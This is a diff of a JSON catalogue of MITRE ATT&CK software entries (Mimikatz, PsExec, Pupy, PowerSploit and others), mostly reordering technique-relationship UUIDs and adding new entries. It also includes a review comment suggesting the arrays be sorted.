"7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -356,7 +244,119 @@ "type": "uses" }, { - "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "544b0346-29ad-41e1-a808-501bb4193f47", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "772bc7a8-a157-42cc-8728-d648e25c7fe7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -460,14 +460,14 @@ "type": "uses" }, { - "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", + "dest-uuid": "1df0326d-2fbc-4d08-a16b-48365f1e742d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "1df0326d-2fbc-4d08-a16b-48365f1e742d", + "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -480,13 +480,6 @@ ], "type": "uses" }, - { - "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56ff457d-5e39-492b-974c-dfd2b8603ffe", "tags": [ 
@@ -494,26 +487,33 @@ ], "type": "uses" }, - { - "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", "value": "Mimikatz - S0002" }, { - "description": "[HTRAN](https://attack.mitre.org/software/S0040) is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks. (Citation: Operation Quantum Entanglement)", + "description": "[HTRAN](https://attack.mitre.org/software/S0040) is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks. (Citation: Operation Quantum Entanglement)(Citation: NCSC Joint Report Public Tools)", "meta": { "external_id": "S0040", "mitre_platforms": [ 
@@ -522,7 +522,8 @@ ], "refs": [ "https://attack.mitre.org/software/S0040", - "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf" + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf", + "https://s3.eu-west-1.amazonaws.com/ncsc-content/files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf" ], "synonyms": [ "HTRAN", @@ -543,6 +544,20 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "d5e96a35-7b0b-4c6a-9533-d63ecbda563e", @@ -818,6 +833,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "38952eac-cb1b-4a71-bad2-ee8223a1c8fe", @@ -865,14 +887,14 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -955,6 +977,13 @@ ], "type": "uses" }, + { + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ 
@@ -968,13 +997,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "5a63f900-5e7e-4928-a746-dd4558e1df71", @@ -1032,14 +1054,7 @@ }, "related": [ { - "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1052,6 +1067,13 @@ ], "type": "uses" }, + { + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", "tags": [ 
@@ -1059,48 +1081,6 @@ ], "type": "uses" }, - { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", "tags": [ @@ -1109,7 +1089,35 @@ "type": "uses" }, { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -1123,21 +1131,14 @@ "type": "uses" }, { - "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1151,7 +1152,28 @@ "type": "uses" }, { - "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", + "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -1211,7 +1233,7 @@ "value": "PsExec - S0029" }, { - "description": "The [Net](https://attack.mitre.org/software/S0039) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. (Citation: Microsoft Net Utility)\n\n[Net](https://attack.mitre.org/software/S0039) has a great deal of functionality, (Citation: Savill 1999) much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) using net use commands, and interacting with services.", + "description": "The [Net](https://attack.mitre.org/software/S0039) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. (Citation: Microsoft Net Utility)\n\n[Net](https://attack.mitre.org/software/S0039) has a great deal of functionality, (Citation: Savill 1999) much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) using net use commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as net1 user.", "meta": { "external_id": "S0039", "mitre_platforms": [ 
@@ -1236,21 +1258,7 @@ "type": "uses" }, { - "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e7eab98d-ae11-4491-bd28-a53ba875865a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1264,14 +1272,7 @@ "type": "uses" }, { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1284,6 +1285,34 @@ ], "type": "uses" }, + { + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ 
@@ -1291,26 +1320,19 @@ ], "type": "uses" }, - { - "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "e7eab98d-ae11-4491-bd28-a53ba875865a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "03342581-f790-4f03-ba41-e82e67392e23", @@ -1342,14 +1364,14 @@ "type": "uses" }, { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1383,14 +1405,14 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1710,7 +1732,8 @@ "mitre_platforms": [ "Linux", "Windows", - "macOS" + "macOS", + "Android" ], "refs": [ "https://attack.mitre.org/software/S0192", 
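Review bot: In the `@@ -1383,14 +1405,14 @@` hunk the two `dest-uuid` values `8f4a33ec-8b1f-4b80-a2f6-642b2e479580` and `241814ae-de3f-4656-b49e-f9a80764d4b7` are only swapped, not changed, and the same pattern repeats in `@@ -1342,14 +1364,14 @@` and across the Pupy and PowerSploit `related` arrays, which makes it impossible to tell a dropped or newly introduced technique mapping from pure reordering noise. Since every relationship is emitted with `estimative-language:likelihood-probability="almost-certain"`, a wrongly added or silently removed `uses` edge is a real data-quality problem that a reviewer cannot catch in this diff. Suggest having the generator sort each `related` array by `dest-uuid` before serialising (e.g. `sorted(related, key=lambda r: r["dest-uuid"])` in the tooling), so future regenerations only show genuine additions and removals. The enclosing Pupy - S0192 object starts and ends outside this hunk.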
@@ -1736,56 +1759,14 @@ "type": "uses" }, { - "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", + "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -1799,42 +1780,7 @@ "type": "uses" }, { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1848,21 +1794,7 @@ "type": "uses" }, { - "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -1883,7 +1815,28 @@ "type": "uses" }, { - "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1897,28 +1850,21 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1932,14 +1878,7 @@ "type": "uses" }, { - "dest-uuid": "428ca9f8-0e33-442a-be87-f869cb4cf73e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -1951,11 +1890,151 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "428ca9f8-0e33-442a-be87-f869cb4cf73e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0fff2797-19cb-41ea-a5f1-8a9303b8158e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "cb69b20d-56d0-41ab-8440-4a4b251614d4", "value": "Pupy - S0192" }, + { + "description": "[Expand](https://attack.mitre.org/software/S0361) is a Windows utility used to expand one or more compressed CAB files.(Citation: Microsoft Expand Utility) It has been used by [BBSRAT](https://attack.mitre.org/software/S0127) to decompress a CAB file into executable content.(Citation: Palo Alto Networks BBSRAT)", + "meta": { + "external_id": "S0361", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0361", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/expand", + "http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/" + ], + "synonyms": [ + "Expand" + ] + }, + "related": [ + { + "dest-uuid": "f2d44246-91f1-478a-b6c8-1227e0ca109d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "ca656c25-44f1-471b-9d9f-e2a3bbb84973", + "value": "Expand - S0361" + }, { "description": "[Tor](https://attack.mitre.org/software/S0183) is a software suite and network that provides increased anonymity on the Internet. 
It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. [Tor](https://attack.mitre.org/software/S0183) utilizes \"Onion Routing,\" in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. (Citation: Dingledine Tor The Second-Generation Onion Router)", "meta": { @@ -2016,14 +2095,14 @@ "type": "uses" }, { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -2068,7 +2147,7 @@ "value": "Responder - S0174" }, { - "description": "[PowerSploit](https://attack.mitre.org/software/S0194) is an open source, offensive security framework compromised of [PowerShell](https://attack.mitre.org/techniques/T1086) modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. (Citation: GitHub PowerSploit May 2012) (Citation: PowerShellMagazine PowerSploit July 2014) (Citation: PowerSploit Documentation)", + "description": "[PowerSploit](https://attack.mitre.org/software/S0194) is an open source, offensive security framework comprised of [PowerShell](https://attack.mitre.org/techniques/T1086) modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. (Citation: GitHub PowerSploit May 2012) (Citation: PowerShellMagazine PowerSploit July 2014) (Citation: PowerSploit Documentation)", "meta": { "external_id": "S0194", "mitre_platforms": [ 
